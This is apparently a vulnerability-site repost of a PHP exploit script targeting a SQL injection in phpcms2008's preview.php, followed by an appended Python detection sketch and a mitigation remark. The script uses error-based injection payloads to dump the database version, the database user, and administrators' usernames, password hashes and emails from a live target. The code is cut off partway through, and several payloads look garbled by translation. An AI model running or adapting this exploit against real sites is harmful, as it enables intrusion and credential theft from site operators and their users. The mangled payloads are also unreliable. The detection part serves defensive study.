phpcms2008 preview.php injection EXP - vulnerability warning - myhack58

2013-12-16T00:00:00
ID MYHACK58:62201341467
Type myhack58
Reporter Anonymous
Modified 2013-12-16T00:00:00

Description

phpcms2008 description

Phpcms2008 is a web content management system built on a PHP+MySQL architecture, and it is also an open-source PHP development platform. Phpcms is developed in a modular fashion, is feature-rich, easy to use and easy to extend, and provides a heavyweight site-building solution for medium and large websites. Over 3 years, drawing on the Phpcms team's long accumulation of web development and database experience and its design philosophy of innovation and the pursuit of perfection, Phpcms has won the recognition of nearly 10 million sites and is increasingly being used on large and medium-sized business websites.

Recently I was helping a friend test a website and found that it was running the phpcms2008 source code. A quick search on WooYun showed that preview.php has a SQL injection vulnerability, so I put together this exp, which also speeds up the injection.

A detailed description of this vulnerability can be found at the link below:

http://www.wooyun.org/bugs/wooyun-2013-022112

phpcms2008 preview.php injection EXP

You may need to change the User-Agent when using it, otherwise the injection will not succeed.

Before injecting, register a user and write the login cookie into the cookie variable.

<? php

/**

  • Created by waiting alone

  • Date: 13-11-24

  • Time: afternoon of 8:3 6

  • Name: phpcms2008_preview.php

  • Waiting alone blog: http://www.waitalone.cn/

*/

print_r('

+------------------------------------------------------+

PHPCMS2008 preview.php injection EXP

Site: http://www.waitalone.cn/

Trojan BY: the waiting alone

Time: 2013-11-24

+------------------------------------------------------+

');

if ($argc < 3) {

print_r('

+------------------------------------------------------+

Useage: php ' . $argv[0] . ' host path

Host: target server (ip/hostname)

Path: path of phpcms

Example: php ' . $argv[0] . ' localhost /phpcms

+------------------------------------------------------+

');

exit;

}

error_reporting(7);

//Statistics time

$start_time = func_time();

$host = $argv[1];

$path = $argv[2];

$cookie = "; //please put the affiliate cookie is written to this variable

if ($cookie == ") exit('please registered members after writing the cookie to the cookie variable.');

if (preg_match('/MySQL Query/i', send_pack("'"))) {

//Database version

$db_ver = "'and(select 1 from(select count(),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema. tables limit 0,1),floor(rand(0)2))x from information_schema. tables group by x)a)#";

echo 'database version:'. get_info($db_ver) . "\n";

//Database user

$db_user = "'and(select 1 from(select count(),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema. tables limit 0,1),floor(rand(0)2))x from information_schema. tables group by x)a)#";

echo 'database user:'. get_info($db_user) . "\n";

//Get users table

$db_member = "' and(select 1 from(select count(),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema. the tables where table_schema=database() and table_name like '%_member%' LIMIT 0,1)) from information_schema. tables limit 0,1),floor(rand(0)2))x from information_schema. tables group by x)a)#";

$member = get_info($db_member);

//Get the admin number

$db_count = "' and(select 1 from(select count(),concat((select (select (SELECT distinct concat(0x7e,count(),0x7e) FROM $member where groupid=1 LIMIT 0,1)) from information_schema. tables limit 0,1),floor(rand(0)*2))x from information_schema. tables group by x)a)#";

$ad_count = get_info($db_count);

echo 'the administrator table, a total of--[' . $ad_count . ']- An administrator' . "\n";

//Display injection data

foreach (range(0, ($ad_count - 1)) as $i) {

$ad_pass = "' and(select 1 from(select count(),concat((select (select (SELECT distinct concat(0x7e,username,0x3a,password,0x3a,email,0x7e) FROM $member where groupid=1 LIMIT $i,1)) from information_schema. tables limit 0,1),floor(rand(0)2))x from information_schema. tables group by x)a)#";

echo 'admin[' . ($i + 1) . ']- >' . get_info($ad_pass) . "\n";

}

} else {

exit("the report adults, the site does not exist for this vulnerability,you can continue to seconds next!\ n");

}

//Extract the return information

function get_info($info)

{

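A detection sketch for the payload family used in the script above, added here as an example and not part of the original post: it normalises a request field (query string, cookie or header value) and flags the floor(rand())/GROUP BY and information_schema/concat(0x..) combinations. The indicator names, the two-indicator rule and the sample values are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Indicators modelled on the shape of the payloads in the script above.
INDICATORS = {
    "floor_rand": re.compile(r"floor\s*\(\s*rand\s*\("),
    "group_by": re.compile(r"\bgroup\s+by\b"),
    "info_schema": re.compile(r"information_schema\s*\.\s*\w+"),
    "hex_concat": re.compile(r"concat\s*\(\s*0x[0-9a-f]+"),
}

def normalise(value, max_rounds=3):
    """Undo nested URL encoding, drop inline SQL comments, fold case and spaces."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    return re.sub(r"\s+", " ", value).lower()

def match_indicators(value):
    text = normalise(value)
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))

def is_error_based_probe(value):
    hits = set(match_indicators(value))
    # One keyword alone is common in benign text, so require a pair.
    return {"floor_rand", "group_by"} <= hits or {"info_schema", "hex_concat"} <= hits

def scan(records):
    """Return (field, indicators) for every record that looks like a probe."""
    return [(f, match_indicators(v)) for f, v in records if is_error_based_probe(v)]

# Constructed request field values (fragments, not real traffic).
SAMPLES = [
    ("query", "catid=12&page=2"),
    ("query", "q=how+to+group+by+month+in+mysql"),
    ("cookie", "auth=abc; x=concat(0x7e,user(),0x7e),floor(rand(0)*2))x "
               "from information_schema.tables group by x"),
    ("query", "id=1%2527%20AND%20FLOOR%2F%2A%2A%2F%28RAND%280%29%2A2%29%29x"
              "%20GrOuP%2F**%2FBy%20x"),
]

if __name__ == "__main__":
    for field, hits in scan(SAMPLES):
        print(field, hits)
```

The script above only proceeds when the response to a lone quote contains "MySQL Query", so keeping database error text out of responses removes the channel this technique reads from. That does not fix the injection itself, which needs parameterised queries in the affected code.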